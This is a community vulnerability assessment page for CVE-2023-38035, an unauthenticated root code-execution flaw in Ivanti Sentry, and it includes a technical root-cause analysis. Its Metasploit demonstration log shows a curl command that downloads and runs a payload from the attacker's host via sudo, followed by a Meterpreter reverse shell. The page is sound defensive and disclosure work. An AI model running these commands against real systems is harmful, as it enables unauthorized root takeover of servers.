Very High
CVE-2023-38035
CVE ID
AttackerKB requires a CVE ID in order to pull vulnerability data and references from the CVE list and the National Vulnerability Database. If available, please supply below:
Add References:
CVE-2023-38035
MITRE ATT&CK
Collection
Command and Control
Credential Access
Defense Evasion
Discovery
Execution
Exfiltration
Impact
Initial Access
Lateral Movement
Persistence
Privilege Escalation
Topic Tags
Description
A security vulnerability in MICS Admin Portal in Ivanti MobileIron Sentry versions 9.18.0 and below, which may allow an attacker to bypass authentication controls on the administrative interface due to an insufficiently restrictive Apache HTTPD configuration.
Add Assessment
Ratings
-
Attacker ValueVery High
-
ExploitabilityVery High
Technical Analysis
Description
Ivanti Sentry (formerly MobileIron Sentry) is vulnerable to an authentication by-pass which exposes API functionality which allows for code execution in the context of the root user. The vulnerable endpoint /mics/services/MICSLogService
exposes a binary web service protocol, Hessian, which allows remote users to invoke functions within the target Sentry system.
One of the functions accessible via Hessian and the vulnerable endpoint is uploadFileUsingFileInput
which accepts a command
argument that gets directly fed into a Runtime.getRuntime().exec(cmd)
call. The command is run in the context of the tomcat2
user however by default tomcat2
is able to execute commands with sudo thus we can use this to execute the payload in the context of the root
user.
Attacker Value and Exploitability
For attacker’s this one is pretty juicy as it gives unauthenticated RCE in the context of the root users, it doesn’t get much better than that. Seeing CVE-2023-38035 being added to the KEV list only one day after it was published speaks volumes on the usefulness to malicious adversaries. To the attacker’s benefit there aren’t any definitive IoCs other than unrecognized HTTP requests to /services/*
which should be cause for concern. The only saving grace is that a Shodan search for Ivanti Sentry targets on the internet only yielded around 500 vulnerable instances exposed at the time the vuln was disclosed.
Vulnerable Versions
Ivanti Sentry versions vulnerable to CVE-2023-38035:
- =< 9.18.0
Vulnerable Environment
A vulnerable MobileIron Sentry version 9.12.0-16 .vhd
file can be downloaded from the following URL
Metasploit Module Demonstration
msf6 > use linux/http/ivanti_sentry_misc_log_service [*] Using configured payload cmd/linux/http/x64/meterpreter_reverse_tcp msf6 exploit(linux/http/ivanti_sentry_misc_log_service) > set rhosts 192.168.1.78 rhosts => 192.168.1.78 msf6 exploit(linux/http/ivanti_sentry_misc_log_service) > set lhost 192.168.1.72 lhost => 192.168.1.72 msf6 exploit(linux/http/ivanti_sentry_misc_log_service) > set fetch_srvhost 192.168.1.72 fetch_srvhost => 192.168.1.72 msf6 exploit(linux/http/ivanti_sentry_misc_log_service) > set verbose true verbose => true msf6 exploit(linux/http/ivanti_sentry_misc_log_service) > exploit [*] Reloading module... [*] Command to run on remote host: curl -so /tmp/ccrjHXsc http://192.168.1.72:8080/etRbFA76UzDRclkL8zrTdg; chmod +x /tmp/ccrjHXsc; /tmp/ccrjHXsc & [*] Fetch Handler listening on 192.168.1.72:8080 [*] HTTP server started [*] Adding resource /etRbFA76UzDRclkL8zrTdg [*] Started reverse TCP handler on 192.168.1.72:4443 [*] Running automatic check ("set AutoCheck false" to disable) [+] The target appears to be vulnerable. [*] Executing Unix (In-Memory) for cmd/linux/http/x64/meterpreter_reverse_tcp [*] Running the command: sudo curl -so /tmp/ccrjHXsc http://192.168.1.72:8080/etRbFA76UzDRclkL8zrTdg [*] Client 192.168.1.78 requested /etRbFA76UzDRclkL8zrTdg [*] Sending payload to 192.168.1.78 (curl/7.29.0) [*] Running the command: sudo chmod +x /tmp/ccrjHXsc [*] Running the command: sudo /tmp/ccrjHXsc & [*] Meterpreter session 6 opened (192.168.1.72:4443 -> 192.168.1.78:40550) at 2023-08-29 14:27:57 -0400 meterpreter > getuid Server username: root meterpreter > sysinfo Computer : localhost.localdomain OS : CentOS 7.8.2003 (Linux 3.10.0-1160.el7.x86_64) Architecture : x64 BuildTuple : x86_64-linux-musl Meterpreter : x64/linux meterpreter > exit
Would you also like to delete your Exploited in the Wild Report?
Delete Assessment Only Delete Assessment and Exploited in the Wild ReportCVSS V3 Severity and Metrics
General Information
Vendors
- ivanti
Products
- mobileiron sentry
Exploited in the Wild
- Government or Industry Alert (https://www.cisa.gov/known-exploited-vulnerabilities-catalog)
- Other: CISA Gov Alert (https://www.cisa.gov/news-events/alerts/2023/08/22/cisa-adds-two-known-exploited-vulnerabilities-catalog)
Would you like to delete this Exploited in the Wild Report?
Yes, delete this reportReferences
Exploit
A PoC added here by the AKB Worker must have at least 2 GitHub stars.
Additional Info
Technical Analysis
Report as Emergent Threat Response
Report as Exploited in the Wild
CVE ID
AttackerKB requires a CVE ID in order to pull vulnerability data and references from the CVE list and the National Vulnerability Database. If available, please supply below: